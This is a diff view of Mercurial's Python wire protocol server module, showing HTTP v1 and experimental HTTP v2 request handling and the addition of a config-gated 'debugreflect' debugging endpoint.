27 urlerr = util.urlerr
28 urlerr = util.urlerr
28 urlreq = util.urlreq
29 urlreq = util.urlreq
29
30
30 HTTP_OK = 200
31 HTTP_OK = 200
31
32
32 HGTYPE = 'application/mercurial-0.1'
33 HGTYPE = 'application/mercurial-0.1'
33 HGTYPE2 = 'application/mercurial-0.2'
34 HGTYPE2 = 'application/mercurial-0.2'
34 HGERRTYPE = 'application/hg-error'
35 HGERRTYPE = 'application/hg-error'
35 FRAMINGTYPE = b'application/mercurial-exp-framing-0001'
36 FRAMINGTYPE = b'application/mercurial-exp-framing-0001'
36
37
37 HTTPV2 = wireprototypes.HTTPV2
38 HTTPV2 = wireprototypes.HTTPV2
38 SSHV1 = wireprototypes.SSHV1
39 SSHV1 = wireprototypes.SSHV1
39 SSHV2 = wireprototypes.SSHV2
40 SSHV2 = wireprototypes.SSHV2
40
41
41 def decodevaluefromheaders(req, headerprefix):
42 def decodevaluefromheaders(req, headerprefix):
42 """Decode a long value from multiple HTTP request headers.
43 """Decode a long value from multiple HTTP request headers.
43
44
44 Returns the value as a bytes, not a str.
45 Returns the value as a bytes, not a str.
45 """
46 """
46 chunks = []
47 chunks = []
47 i = 1
48 i = 1
48 while True:
49 while True:
49 v = req.headers.get(b'%s-%d' % (headerprefix, i))
50 v = req.headers.get(b'%s-%d' % (headerprefix, i))
50 if v is None:
51 if v is None:
51 break
52 break
52 chunks.append(pycompat.bytesurl(v))
53 chunks.append(pycompat.bytesurl(v))
53 i += 1
54 i += 1
54
55
55 return ''.join(chunks)
56 return ''.join(chunks)
56
57
57 class httpv1protocolhandler(wireprototypes.baseprotocolhandler):
58 class httpv1protocolhandler(wireprototypes.baseprotocolhandler):
58 def __init__(self, req, ui, checkperm):
59 def __init__(self, req, ui, checkperm):
59 self._req = req
60 self._req = req
60 self._ui = ui
61 self._ui = ui
61 self._checkperm = checkperm
62 self._checkperm = checkperm
62
63
63 @property
64 @property
64 def name(self):
65 def name(self):
65 return 'http-v1'
66 return 'http-v1'
66
67
67 def getargs(self, args):
68 def getargs(self, args):
68 knownargs = self._args()
69 knownargs = self._args()
69 data = {}
70 data = {}
70 keys = args.split()
71 keys = args.split()
71 for k in keys:
72 for k in keys:
72 if k == '*':
73 if k == '*':
73 star = {}
74 star = {}
74 for key in knownargs.keys():
75 for key in knownargs.keys():
75 if key != 'cmd' and key not in keys:
76 if key != 'cmd' and key not in keys:
76 star[key] = knownargs[key][0]
77 star[key] = knownargs[key][0]
77 data['*'] = star
78 data['*'] = star
78 else:
79 else:
79 data[k] = knownargs[k][0]
80 data[k] = knownargs[k][0]
80 return [data[k] for k in keys]
81 return [data[k] for k in keys]
81
82
82 def _args(self):
83 def _args(self):
83 args = self._req.qsparams.asdictoflists()
84 args = self._req.qsparams.asdictoflists()
84 postlen = int(self._req.headers.get(b'X-HgArgs-Post', 0))
85 postlen = int(self._req.headers.get(b'X-HgArgs-Post', 0))
85 if postlen:
86 if postlen:
86 args.update(urlreq.parseqs(
87 args.update(urlreq.parseqs(
87 self._req.bodyfh.read(postlen), keep_blank_values=True))
88 self._req.bodyfh.read(postlen), keep_blank_values=True))
88 return args
89 return args
89
90
90 argvalue = decodevaluefromheaders(self._req, b'X-HgArg')
91 argvalue = decodevaluefromheaders(self._req, b'X-HgArg')
91 args.update(urlreq.parseqs(argvalue, keep_blank_values=True))
92 args.update(urlreq.parseqs(argvalue, keep_blank_values=True))
92 return args
93 return args
93
94
94 def forwardpayload(self, fp):
95 def forwardpayload(self, fp):
95 # Existing clients *always* send Content-Length.
96 # Existing clients *always* send Content-Length.
96 length = int(self._req.headers[b'Content-Length'])
97 length = int(self._req.headers[b'Content-Length'])
97
98
98 # If httppostargs is used, we need to read Content-Length
99 # If httppostargs is used, we need to read Content-Length
99 # minus the amount that was consumed by args.
100 # minus the amount that was consumed by args.
100 length -= int(self._req.headers.get(b'X-HgArgs-Post', 0))
101 length -= int(self._req.headers.get(b'X-HgArgs-Post', 0))
101 for s in util.filechunkiter(self._req.bodyfh, limit=length):
102 for s in util.filechunkiter(self._req.bodyfh, limit=length):
102 fp.write(s)
103 fp.write(s)
103
104
104 @contextlib.contextmanager
105 @contextlib.contextmanager
105 def mayberedirectstdio(self):
106 def mayberedirectstdio(self):
106 oldout = self._ui.fout
107 oldout = self._ui.fout
107 olderr = self._ui.ferr
108 olderr = self._ui.ferr
108
109
109 out = util.stringio()
110 out = util.stringio()
110
111
111 try:
112 try:
112 self._ui.fout = out
113 self._ui.fout = out
113 self._ui.ferr = out
114 self._ui.ferr = out
114 yield out
115 yield out
115 finally:
116 finally:
116 self._ui.fout = oldout
117 self._ui.fout = oldout
117 self._ui.ferr = olderr
118 self._ui.ferr = olderr
118
119
119 def client(self):
120 def client(self):
120 return 'remote:%s:%s:%s' % (
121 return 'remote:%s:%s:%s' % (
121 self._req.urlscheme,
122 self._req.urlscheme,
122 urlreq.quote(self._req.remotehost or ''),
123 urlreq.quote(self._req.remotehost or ''),
123 urlreq.quote(self._req.remoteuser or ''))
124 urlreq.quote(self._req.remoteuser or ''))
124
125
125 def addcapabilities(self, repo, caps):
126 def addcapabilities(self, repo, caps):
126 caps.append('httpheader=%d' %
127 caps.append('httpheader=%d' %
127 repo.ui.configint('server', 'maxhttpheaderlen'))
128 repo.ui.configint('server', 'maxhttpheaderlen'))
128 if repo.ui.configbool('experimental', 'httppostargs'):
129 if repo.ui.configbool('experimental', 'httppostargs'):
129 caps.append('httppostargs')
130 caps.append('httppostargs')
130
131
131 # FUTURE advertise 0.2rx once support is implemented
132 # FUTURE advertise 0.2rx once support is implemented
132 # FUTURE advertise minrx and mintx after consulting config option
133 # FUTURE advertise minrx and mintx after consulting config option
133 caps.append('httpmediatype=0.1rx,0.1tx,0.2tx')
134 caps.append('httpmediatype=0.1rx,0.1tx,0.2tx')
134
135
135 compengines = wireproto.supportedcompengines(repo.ui, util.SERVERROLE)
136 compengines = wireproto.supportedcompengines(repo.ui, util.SERVERROLE)
136 if compengines:
137 if compengines:
137 comptypes = ','.join(urlreq.quote(e.wireprotosupport().name)
138 comptypes = ','.join(urlreq.quote(e.wireprotosupport().name)
138 for e in compengines)
139 for e in compengines)
139 caps.append('compression=%s' % comptypes)
140 caps.append('compression=%s' % comptypes)
140
141
141 return caps
142 return caps
142
143
143 def checkperm(self, perm):
144 def checkperm(self, perm):
144 return self._checkperm(perm)
145 return self._checkperm(perm)
145
146
146 # This method exists mostly so that extensions like remotefilelog can
147 # This method exists mostly so that extensions like remotefilelog can
147 # disable a kludgey legacy method only over http. As of early 2018,
148 # disable a kludgey legacy method only over http. As of early 2018,
148 # there are no other known users, so with any luck we can discard this
149 # there are no other known users, so with any luck we can discard this
149 # hook if remotefilelog becomes a first-party extension.
150 # hook if remotefilelog becomes a first-party extension.
150 def iscmd(cmd):
151 def iscmd(cmd):
151 return cmd in wireproto.commands
152 return cmd in wireproto.commands
152
153
153 def handlewsgirequest(rctx, req, res, checkperm):
154 def handlewsgirequest(rctx, req, res, checkperm):
154 """Possibly process a wire protocol request.
155 """Possibly process a wire protocol request.
155
156
156 If the current request is a wire protocol request, the request is
157 If the current request is a wire protocol request, the request is
157 processed by this function.
158 processed by this function.
158
159
159 ``req`` is a ``parsedrequest`` instance.
160 ``req`` is a ``parsedrequest`` instance.
160 ``res`` is a ``wsgiresponse`` instance.
161 ``res`` is a ``wsgiresponse`` instance.
161
162
162 Returns a bool indicating if the request was serviced. If set, the caller
163 Returns a bool indicating if the request was serviced. If set, the caller
163 should stop processing the request, as a response has already been issued.
164 should stop processing the request, as a response has already been issued.
164 """
165 """
165 # Avoid cycle involving hg module.
166 # Avoid cycle involving hg module.
166 from .hgweb import common as hgwebcommon
167 from .hgweb import common as hgwebcommon
167
168
168 repo = rctx.repo
169 repo = rctx.repo
169
170
170 # HTTP version 1 wire protocol requests are denoted by a "cmd" query
171 # HTTP version 1 wire protocol requests are denoted by a "cmd" query
171 # string parameter. If it isn't present, this isn't a wire protocol
172 # string parameter. If it isn't present, this isn't a wire protocol
172 # request.
173 # request.
173 if 'cmd' not in req.qsparams:
174 if 'cmd' not in req.qsparams:
174 return False
175 return False
175
176
176 cmd = req.qsparams['cmd']
177 cmd = req.qsparams['cmd']
177
178
178 # The "cmd" request parameter is used by both the wire protocol and hgweb.
179 # The "cmd" request parameter is used by both the wire protocol and hgweb.
179 # While not all wire protocol commands are available for all transports,
180 # While not all wire protocol commands are available for all transports,
180 # if we see a "cmd" value that resembles a known wire protocol command, we
181 # if we see a "cmd" value that resembles a known wire protocol command, we
181 # route it to a protocol handler. This is better than routing possible
182 # route it to a protocol handler. This is better than routing possible
182 # wire protocol requests to hgweb because it prevents hgweb from using
183 # wire protocol requests to hgweb because it prevents hgweb from using
183 # known wire protocol commands and it is less confusing for machine
184 # known wire protocol commands and it is less confusing for machine
184 # clients.
185 # clients.
185 if not iscmd(cmd):
186 if not iscmd(cmd):
186 return False
187 return False
187
188
188 # The "cmd" query string argument is only valid on the root path of the
189 # The "cmd" query string argument is only valid on the root path of the
189 # repo. e.g. ``/?cmd=foo``, ``/repo?cmd=foo``. URL paths within the repo
190 # repo. e.g. ``/?cmd=foo``, ``/repo?cmd=foo``. URL paths within the repo
190 # like ``/blah?cmd=foo`` are not allowed. So don't recognize the request
191 # like ``/blah?cmd=foo`` are not allowed. So don't recognize the request
191 # in this case. We send an HTTP 404 for backwards compatibility reasons.
192 # in this case. We send an HTTP 404 for backwards compatibility reasons.
192 if req.dispatchpath:
193 if req.dispatchpath:
193 res.status = hgwebcommon.statusmessage(404)
194 res.status = hgwebcommon.statusmessage(404)
194 res.headers['Content-Type'] = HGTYPE
195 res.headers['Content-Type'] = HGTYPE
195 # TODO This is not a good response to issue for this request. This
196 # TODO This is not a good response to issue for this request. This
196 # is mostly for BC for now.
197 # is mostly for BC for now.
197 res.setbodybytes('0\n%s\n' % b'Not Found')
198 res.setbodybytes('0\n%s\n' % b'Not Found')
198 return True
199 return True
199
200
200 proto = httpv1protocolhandler(req, repo.ui,
201 proto = httpv1protocolhandler(req, repo.ui,
201 lambda perm: checkperm(rctx, req, perm))
202 lambda perm: checkperm(rctx, req, perm))
202
203
203 # The permissions checker should be the only thing that can raise an
204 # The permissions checker should be the only thing that can raise an
204 # ErrorResponse. It is kind of a layer violation to catch an hgweb
205 # ErrorResponse. It is kind of a layer violation to catch an hgweb
205 # exception here. So consider refactoring into a exception type that
206 # exception here. So consider refactoring into a exception type that
206 # is associated with the wire protocol.
207 # is associated with the wire protocol.
207 try:
208 try:
208 _callhttp(repo, req, res, proto, cmd)
209 _callhttp(repo, req, res, proto, cmd)
209 except hgwebcommon.ErrorResponse as e:
210 except hgwebcommon.ErrorResponse as e:
210 for k, v in e.headers:
211 for k, v in e.headers:
211 res.headers[k] = v
212 res.headers[k] = v
212 res.status = hgwebcommon.statusmessage(e.code, pycompat.bytestr(e))
213 res.status = hgwebcommon.statusmessage(e.code, pycompat.bytestr(e))
213 # TODO This response body assumes the failed command was
214 # TODO This response body assumes the failed command was
214 # "unbundle." That assumption is not always valid.
215 # "unbundle." That assumption is not always valid.
215 res.setbodybytes('0\n%s\n' % pycompat.bytestr(e))
216 res.setbodybytes('0\n%s\n' % pycompat.bytestr(e))
216
217
217 return True
218 return True
218
219
219 def handlewsgiapirequest(rctx, req, res, checkperm):
220 def handlewsgiapirequest(rctx, req, res, checkperm):
220 """Handle requests to /api/*."""
221 """Handle requests to /api/*."""
221 assert req.dispatchparts[0] == b'api'
222 assert req.dispatchparts[0] == b'api'
222
223
223 repo = rctx.repo
224 repo = rctx.repo
224
225
225 # This whole URL space is experimental for now. But we want to
226 # This whole URL space is experimental for now. But we want to
226 # reserve the URL space. So, 404 all URLs if the feature isn't enabled.
227 # reserve the URL space. So, 404 all URLs if the feature isn't enabled.
227 if not repo.ui.configbool('experimental', 'web.apiserver'):
228 if not repo.ui.configbool('experimental', 'web.apiserver'):
228 res.status = b'404 Not Found'
229 res.status = b'404 Not Found'
229 res.headers[b'Content-Type'] = b'text/plain'
230 res.headers[b'Content-Type'] = b'text/plain'
230 res.setbodybytes(_('Experimental API server endpoint not enabled'))
231 res.setbodybytes(_('Experimental API server endpoint not enabled'))
231 return
232 return
232
233
233 # The URL space is /api/<protocol>/*. The structure of URLs under varies
234 # The URL space is /api/<protocol>/*. The structure of URLs under varies
234 # by <protocol>.
235 # by <protocol>.
235
236
236 # Registered APIs are made available via config options of the name of
237 # Registered APIs are made available via config options of the name of
237 # the protocol.
238 # the protocol.
238 availableapis = set()
239 availableapis = set()
239 for k, v in API_HANDLERS.items():
240 for k, v in API_HANDLERS.items():
240 section, option = v['config']
241 section, option = v['config']
241 if repo.ui.configbool(section, option):
242 if repo.ui.configbool(section, option):
242 availableapis.add(k)
243 availableapis.add(k)
243
244
244 # Requests to /api/ list available APIs.
245 # Requests to /api/ list available APIs.
245 if req.dispatchparts == [b'api']:
246 if req.dispatchparts == [b'api']:
246 res.status = b'200 OK'
247 res.status = b'200 OK'
247 res.headers[b'Content-Type'] = b'text/plain'
248 res.headers[b'Content-Type'] = b'text/plain'
248 lines = [_('APIs can be accessed at /api/<name>, where <name> can be '
249 lines = [_('APIs can be accessed at /api/<name>, where <name> can be '
249 'one of the following:\n')]
250 'one of the following:\n')]
250 if availableapis:
251 if availableapis:
251 lines.extend(sorted(availableapis))
252 lines.extend(sorted(availableapis))
252 else:
253 else:
253 lines.append(_('(no available APIs)\n'))
254 lines.append(_('(no available APIs)\n'))
254 res.setbodybytes(b'\n'.join(lines))
255 res.setbodybytes(b'\n'.join(lines))
255 return
256 return
256
257
257 proto = req.dispatchparts[1]
258 proto = req.dispatchparts[1]
258
259
259 if proto not in API_HANDLERS:
260 if proto not in API_HANDLERS:
260 res.status = b'404 Not Found'
261 res.status = b'404 Not Found'
261 res.headers[b'Content-Type'] = b'text/plain'
262 res.headers[b'Content-Type'] = b'text/plain'
262 res.setbodybytes(_('Unknown API: %s\nKnown APIs: %s') % (
263 res.setbodybytes(_('Unknown API: %s\nKnown APIs: %s') % (
263 proto, b', '.join(sorted(availableapis))))
264 proto, b', '.join(sorted(availableapis))))
264 return
265 return
265
266
266 if proto not in availableapis:
267 if proto not in availableapis:
267 res.status = b'404 Not Found'
268 res.status = b'404 Not Found'
268 res.headers[b'Content-Type'] = b'text/plain'
269 res.headers[b'Content-Type'] = b'text/plain'
269 res.setbodybytes(_('API %s not enabled\n') % proto)
270 res.setbodybytes(_('API %s not enabled\n') % proto)
270 return
271 return
271
272
272 API_HANDLERS[proto]['handler'](rctx, req, res, checkperm,
273 API_HANDLERS[proto]['handler'](rctx, req, res, checkperm,
273 req.dispatchparts[2:])
274 req.dispatchparts[2:])
274
275
275 def _handlehttpv2request(rctx, req, res, checkperm, urlparts):
276 def _handlehttpv2request(rctx, req, res, checkperm, urlparts):
276 from .hgweb import common as hgwebcommon
277 from .hgweb import common as hgwebcommon
277
278
278 # URL space looks like: <permissions>/<command>, where <permission> can
279 # URL space looks like: <permissions>/<command>, where <permission> can
279 # be ``ro`` or ``rw`` to signal read-only or read-write, respectively.
280 # be ``ro`` or ``rw`` to signal read-only or read-write, respectively.
280
281
281 # Root URL does nothing meaningful... yet.
282 # Root URL does nothing meaningful... yet.
282 if not urlparts:
283 if not urlparts:
283 res.status = b'200 OK'
284 res.status = b'200 OK'
284 res.headers[b'Content-Type'] = b'text/plain'
285 res.headers[b'Content-Type'] = b'text/plain'
285 res.setbodybytes(_('HTTP version 2 API handler'))
286 res.setbodybytes(_('HTTP version 2 API handler'))
286 return
287 return
287
288
288 if len(urlparts) == 1:
289 if len(urlparts) == 1:
289 res.status = b'404 Not Found'
290 res.status = b'404 Not Found'
290 res.headers[b'Content-Type'] = b'text/plain'
291 res.headers[b'Content-Type'] = b'text/plain'
291 res.setbodybytes(_('do not know how to process %s\n') %
292 res.setbodybytes(_('do not know how to process %s\n') %
292 req.dispatchpath)
293 req.dispatchpath)
293 return
294 return
294
295
295 permission, command = urlparts[0:2]
296 permission, command = urlparts[0:2]
296
297
297 if permission not in (b'ro', b'rw'):
298 if permission not in (b'ro', b'rw'):
298 res.status = b'404 Not Found'
299 res.status = b'404 Not Found'
299 res.headers[b'Content-Type'] = b'text/plain'
300 res.headers[b'Content-Type'] = b'text/plain'
300 res.setbodybytes(_('unknown permission: %s') % permission)
301 res.setbodybytes(_('unknown permission: %s') % permission)
301 return
302 return
302
303
303 if req.method != 'POST':
304 if req.method != 'POST':
304 res.status = b'405 Method Not Allowed'
305 res.status = b'405 Method Not Allowed'
305 res.headers[b'Allow'] = b'POST'
306 res.headers[b'Allow'] = b'POST'
306 res.setbodybytes(_('commands require POST requests'))
307 res.setbodybytes(_('commands require POST requests'))
307 return
308 return
308
309
309 # At some point we'll want to use our own API instead of recycling the
310 # At some point we'll want to use our own API instead of recycling the
310 # behavior of version 1 of the wire protocol...
311 # behavior of version 1 of the wire protocol...
311 # TODO return reasonable responses - not responses that overload the
312 # TODO return reasonable responses - not responses that overload the
312 # HTTP status line message for error reporting.
313 # HTTP status line message for error reporting.
313 try:
314 try:
314 checkperm(rctx, req, 'pull' if permission == b'ro' else 'push')
315 checkperm(rctx, req, 'pull' if permission == b'ro' else 'push')
315 except hgwebcommon.ErrorResponse as e:
316 except hgwebcommon.ErrorResponse as e:
316 res.status = hgwebcommon.statusmessage(e.code, pycompat.bytestr(e))
317 res.status = hgwebcommon.statusmessage(e.code, pycompat.bytestr(e))
317 for k, v in e.headers:
318 for k, v in e.headers:
318 res.headers[k] = v
319 res.headers[k] = v
319 res.setbodybytes('permission denied')
320 res.setbodybytes('permission denied')
320 return
321 return
321
322
323 # We have a special endpoint to reflect the request back at the client.
324 if command == b'debugreflect':
325 _processhttpv2reflectrequest(rctx.repo.ui, rctx.repo, req, res)
326 return
327
322 if command not in wireproto.commands:
328 if command not in wireproto.commands:
323 res.status = b'404 Not Found'
329 res.status = b'404 Not Found'
324 res.headers[b'Content-Type'] = b'text/plain'
330 res.headers[b'Content-Type'] = b'text/plain'
325 res.setbodybytes(_('unknown wire protocol command: %s\n') % command)
331 res.setbodybytes(_('unknown wire protocol command: %s\n') % command)
326 return
332 return
327
333
328 repo = rctx.repo
334 repo = rctx.repo
329 ui = repo.ui
335 ui = repo.ui
330
336
331 proto = httpv2protocolhandler(req, ui)
337 proto = httpv2protocolhandler(req, ui)
332
338
333 if not wireproto.commands.commandavailable(command, proto):
339 if not wireproto.commands.commandavailable(command, proto):
334 res.status = b'404 Not Found'
340 res.status = b'404 Not Found'
335 res.headers[b'Content-Type'] = b'text/plain'
341 res.headers[b'Content-Type'] = b'text/plain'
336 res.setbodybytes(_('invalid wire protocol command: %s') % command)
342 res.setbodybytes(_('invalid wire protocol command: %s') % command)
337 return
343 return
338
344
339 if req.headers.get(b'Accept') != FRAMINGTYPE:
345 if req.headers.get(b'Accept') != FRAMINGTYPE:
340 res.status = b'406 Not Acceptable'
346 res.status = b'406 Not Acceptable'
341 res.headers[b'Content-Type'] = b'text/plain'
347 res.headers[b'Content-Type'] = b'text/plain'
342 res.setbodybytes(_('client MUST specify Accept header with value: %s\n')
348 res.setbodybytes(_('client MUST specify Accept header with value: %s\n')
343 % FRAMINGTYPE)
349 % FRAMINGTYPE)
344 return
350 return
345
351
346 if (b'Content-Type' in req.headers
352 if req.headers.get(b'Content-Type') != FRAMINGTYPE:
347 and req.headers[b'Content-Type'] != FRAMINGTYPE):
348 res.status = b'415 Unsupported Media Type'
353 res.status = b'415 Unsupported Media Type'
349 # TODO we should send a response with appropriate media type,
354 # TODO we should send a response with appropriate media type,
350 # since client does Accept it.
355 # since client does Accept it.
351 res.headers[b'Content-Type'] = b'text/plain'
356 res.headers[b'Content-Type'] = b'text/plain'
352 res.setbodybytes(_('client MUST send Content-Type header with '
357 res.setbodybytes(_('client MUST send Content-Type header with '
353 'value: %s\n') % FRAMINGTYPE)
358 'value: %s\n') % FRAMINGTYPE)
354 return
359 return
355
360
356 # We don't do anything meaningful yet.
361 # We don't do anything meaningful yet.
357 res.status = b'200 OK'
362 res.status = b'200 OK'
358 res.headers[b'Content-Type'] = b'text/plain'
363 res.headers[b'Content-Type'] = b'text/plain'
359 res.setbodybytes(b'/'.join(urlparts) + b'\n')
364 res.setbodybytes(b'/'.join(urlparts) + b'\n')
360
365
366 def _processhttpv2reflectrequest(ui, repo, req, res):
367 """Reads unified frame protocol request and dumps out state to client.
368
369 This special endpoint can be used to help debug the wire protocol.
370
371 Instead of routing the request through the normal dispatch mechanism,
372 we instead read all frames, decode them, and feed them into our state
373 tracker. We then dump the log of all that activity back out to the
374 client.
375 """
376 import json
377
378 # Reflection APIs have a history of being abused, accidentally disclosing
379 # sensitive data, etc. So we have a config knob.
380 if not ui.configbool('experimental', 'web.api.debugreflect'):
381 res.status = b'404 Not Found'
382 res.headers[b'Content-Type'] = b'text/plain'
383 res.setbodybytes(_('debugreflect service not available'))
384 return
385
386 # We assume we have a unified framing protocol request body.
387
388 reactor = wireprotoframing.serverreactor()
389 states = []
390
391 while True:
392 frame = wireprotoframing.readframe(req.bodyfh)
393
394 if not frame:
395 states.append(b'received: <no frame>')
396 break
397
398 frametype, frameflags, payload = frame
399 states.append(b'received: %d %d %s' % (frametype, frameflags, payload))
400
401 action, meta = reactor.onframerecv(frametype, frameflags, payload)
402 states.append(json.dumps((action, meta), sort_keys=True,
403 separators=(', ', ': ')))
404
405 res.status = b'200 OK'
406 res.headers[b'Content-Type'] = b'text/plain'
407 res.setbodybytes(b'\n'.join(states))
408
361 # Maps API name to metadata so custom API can be registered.
409 # Maps API name to metadata so custom API can be registered.
362 API_HANDLERS = {
410 API_HANDLERS = {
363 HTTPV2: {
411 HTTPV2: {
364 'config': ('experimental', 'web.api.http-v2'),
412 'config': ('experimental', 'web.api.http-v2'),
365 'handler': _handlehttpv2request,
413 'handler': _handlehttpv2request,
366 },
414 },
367 }
415 }
368
416
369 class httpv2protocolhandler(wireprototypes.baseprotocolhandler):
417 class httpv2protocolhandler(wireprototypes.baseprotocolhandler):
370 def __init__(self, req, ui):
418 def __init__(self, req, ui):
371 self._req = req
419 self._req = req
372 self._ui = ui
420 self._ui = ui
373
421
374 @property
422 @property
375 def name(self):
423 def name(self):
376 return HTTPV2
424 return HTTPV2
377
425
378 def getargs(self, args):
426 def getargs(self, args):
379 raise NotImplementedError
427 raise NotImplementedError
380
428
381 def forwardpayload(self, fp):
429 def forwardpayload(self, fp):
382 raise NotImplementedError
430 raise NotImplementedError
383
431
384 @contextlib.contextmanager
432 @contextlib.contextmanager
385 def mayberedirectstdio(self):
433 def mayberedirectstdio(self):
386 raise NotImplementedError
434 raise NotImplementedError
387
435
388 def client(self):
436 def client(self):
389 raise NotImplementedError
437 raise NotImplementedError
390
438
391 def addcapabilities(self, repo, caps):
439 def addcapabilities(self, repo, caps):
392 raise NotImplementedError
440 raise NotImplementedError
393
441
394 def checkperm(self, perm):
442 def checkperm(self, perm):
395 raise NotImplementedError
443 raise NotImplementedError
396
444
397 def _httpresponsetype(ui, req, prefer_uncompressed):
445 def _httpresponsetype(ui, req, prefer_uncompressed):
398 """Determine the appropriate response type and compression settings.
446 """Determine the appropriate response type and compression settings.
399
447
400 Returns a tuple of (mediatype, compengine, engineopts).
448 Returns a tuple of (mediatype, compengine, engineopts).
401 """
449 """
402 # Determine the response media type and compression engine based
450 # Determine the response media type and compression engine based
403 # on the request parameters.
451 # on the request parameters.
404 protocaps = decodevaluefromheaders(req, 'X-HgProto').split(' ')
452 protocaps = decodevaluefromheaders(req, 'X-HgProto').split(' ')
405
453
406 if '0.2' in protocaps:
454 if '0.2' in protocaps:
407 # All clients are expected to support uncompressed data.
455 # All clients are expected to support uncompressed data.
408 if prefer_uncompressed:
456 if prefer_uncompressed:
409 return HGTYPE2, util._noopengine(), {}
457 return HGTYPE2, util._noopengine(), {}
410
458
411 # Default as defined by wire protocol spec.
459 # Default as defined by wire protocol spec.
412 compformats = ['zlib', 'none']
460 compformats = ['zlib', 'none']
413 for cap in protocaps:
461 for cap in protocaps:
414 if cap.startswith('comp='):
462 if cap.startswith('comp='):
415 compformats = cap[5:].split(',')
463 compformats = cap[5:].split(',')
416 break
464 break
417
465
418 # Now find an agreed upon compression format.
466 # Now find an agreed upon compression format.
419 for engine in wireproto.supportedcompengines(ui, util.SERVERROLE):
467 for engine in wireproto.supportedcompengines(ui, util.SERVERROLE):
420 if engine.wireprotosupport().name in compformats:
468 if engine.wireprotosupport().name in compformats:
421 opts = {}
469 opts = {}
422 level = ui.configint('server', '%slevel' % engine.name())
470 level = ui.configint('server', '%slevel' % engine.name())
423 if level is not None:
471 if level is not None:
424 opts['level'] = level
472 opts['level'] = level
425
473
426 return HGTYPE2, engine, opts
474 return HGTYPE2, engine, opts
427
475
428 # No mutually supported compression format. Fall back to the
476 # No mutually supported compression format. Fall back to the
429 # legacy protocol.
477 # legacy protocol.
430
478
431 # Don't allow untrusted settings because disabling compression or
479 # Don't allow untrusted settings because disabling compression or
432 # setting a very high compression level could lead to flooding
480 # setting a very high compression level could lead to flooding
433 # the server's network or CPU.
481 # the server's network or CPU.
434 opts = {'level': ui.configint('server', 'zliblevel')}
482 opts = {'level': ui.configint('server', 'zliblevel')}
435 return HGTYPE, util.compengines['zlib'], opts
483 return HGTYPE, util.compengines['zlib'], opts
436
484
437 def _callhttp(repo, req, res, proto, cmd):
485 def _callhttp(repo, req, res, proto, cmd):
438 # Avoid cycle involving hg module.
486 # Avoid cycle involving hg module.
439 from .hgweb import common as hgwebcommon
487 from .hgweb import common as hgwebcommon
440
488
441 def genversion2(gen, engine, engineopts):
489 def genversion2(gen, engine, engineopts):
442 # application/mercurial-0.2 always sends a payload header
490 # application/mercurial-0.2 always sends a payload header
443 # identifying the compression engine.
491 # identifying the compression engine.
444 name = engine.wireprotosupport().name
492 name = engine.wireprotosupport().name
445 assert 0 < len(name) < 256
493 assert 0 < len(name) < 256
446 yield struct.pack('B', len(name))
494 yield struct.pack('B', len(name))
447 yield name
495 yield name
448
496
449 for chunk in gen:
497 for chunk in gen:
450 yield chunk
498 yield chunk
451
499
452 def setresponse(code, contenttype, bodybytes=None, bodygen=None):
500 def setresponse(code, contenttype, bodybytes=None, bodygen=None):
453 if code == HTTP_OK:
501 if code == HTTP_OK:
454 res.status = '200 Script output follows'
502 res.status = '200 Script output follows'
455 else:
503 else:
456 res.status = hgwebcommon.statusmessage(code)
504 res.status = hgwebcommon.statusmessage(code)
457
505
458 res.headers['Content-Type'] = contenttype
506 res.headers['Content-Type'] = contenttype
459
507
460 if bodybytes is not None:
508 if bodybytes is not None:
461 res.setbodybytes(bodybytes)
509 res.setbodybytes(bodybytes)
462 if bodygen is not None:
510 if bodygen is not None:
463 res.setbodygen(bodygen)
511 res.setbodygen(bodygen)
464
512
465 if not wireproto.commands.commandavailable(cmd, proto):
513 if not wireproto.commands.commandavailable(cmd, proto):
466 setresponse(HTTP_OK, HGERRTYPE,
514 setresponse(HTTP_OK, HGERRTYPE,
467 _('requested wire protocol command is not available over '
515 _('requested wire protocol command is not available over '
468 'HTTP'))
516 'HTTP'))
469 return
517 return
470
518
471 proto.checkperm(wireproto.commands[cmd].permission)
519 proto.checkperm(wireproto.commands[cmd].permission)
472
520
473 rsp = wireproto.dispatch(repo, proto, cmd)
521 rsp = wireproto.dispatch(repo, proto, cmd)
474
522
475 if isinstance(rsp, bytes):
523 if isinstance(rsp, bytes):
476 setresponse(HTTP_OK, HGTYPE, bodybytes=rsp)
524 setresponse(HTTP_OK, HGTYPE, bodybytes=rsp)
477 elif isinstance(rsp, wireprototypes.bytesresponse):
525 elif isinstance(rsp, wireprototypes.bytesresponse):
478 setresponse(HTTP_OK, HGTYPE, bodybytes=rsp.data)
526 setresponse(HTTP_OK, HGTYPE, bodybytes=rsp.data)
479 elif isinstance(rsp, wireprototypes.streamreslegacy):
527 elif isinstance(rsp, wireprototypes.streamreslegacy):
480 setresponse(HTTP_OK, HGTYPE, bodygen=rsp.gen)
528 setresponse(HTTP_OK, HGTYPE, bodygen=rsp.gen)
481 elif isinstance(rsp, wireprototypes.streamres):
529 elif isinstance(rsp, wireprototypes.streamres):
482 gen = rsp.gen
530 gen = rsp.gen
483
531
484 # This code for compression should not be streamres specific. It
532 # This code for compression should not be streamres specific. It
485 # is here because we only compress streamres at the moment.
533 # is here because we only compress streamres at the moment.
486 mediatype, engine, engineopts = _httpresponsetype(
534 mediatype, engine, engineopts = _httpresponsetype(
487 repo.ui, req, rsp.prefer_uncompressed)
535 repo.ui, req, rsp.prefer_uncompressed)
488 gen = engine.compressstream(gen, engineopts)
536 gen = engine.compressstream(gen, engineopts)
489
537
490 if mediatype == HGTYPE2:
538 if mediatype == HGTYPE2:
491 gen = genversion2(gen, engine, engineopts)
539 gen = genversion2(gen, engine, engineopts)
492
540
493 setresponse(HTTP_OK, mediatype, bodygen=gen)
541 setresponse(HTTP_OK, mediatype, bodygen=gen)
494 elif isinstance(rsp, wireprototypes.pushres):
542 elif isinstance(rsp, wireprototypes.pushres):
495 rsp = '%d\n%s' % (rsp.res, rsp.output)
543 rsp = '%d\n%s' % (rsp.res, rsp.output)
496 setresponse(HTTP_OK, HGTYPE, bodybytes=rsp)
544 setresponse(HTTP_OK, HGTYPE, bodybytes=rsp)
497 elif isinstance(rsp, wireprototypes.pusherr):
545 elif isinstance(rsp, wireprototypes.pusherr):
498 rsp = '0\n%s\n' % rsp.res
546 rsp = '0\n%s\n' % rsp.res
499 res.drain = True
547 res.drain = True
500 setresponse(HTTP_OK, HGTYPE, bodybytes=rsp)
548 setresponse(HTTP_OK, HGTYPE, bodybytes=rsp)
501 elif isinstance(rsp, wireprototypes.ooberror):
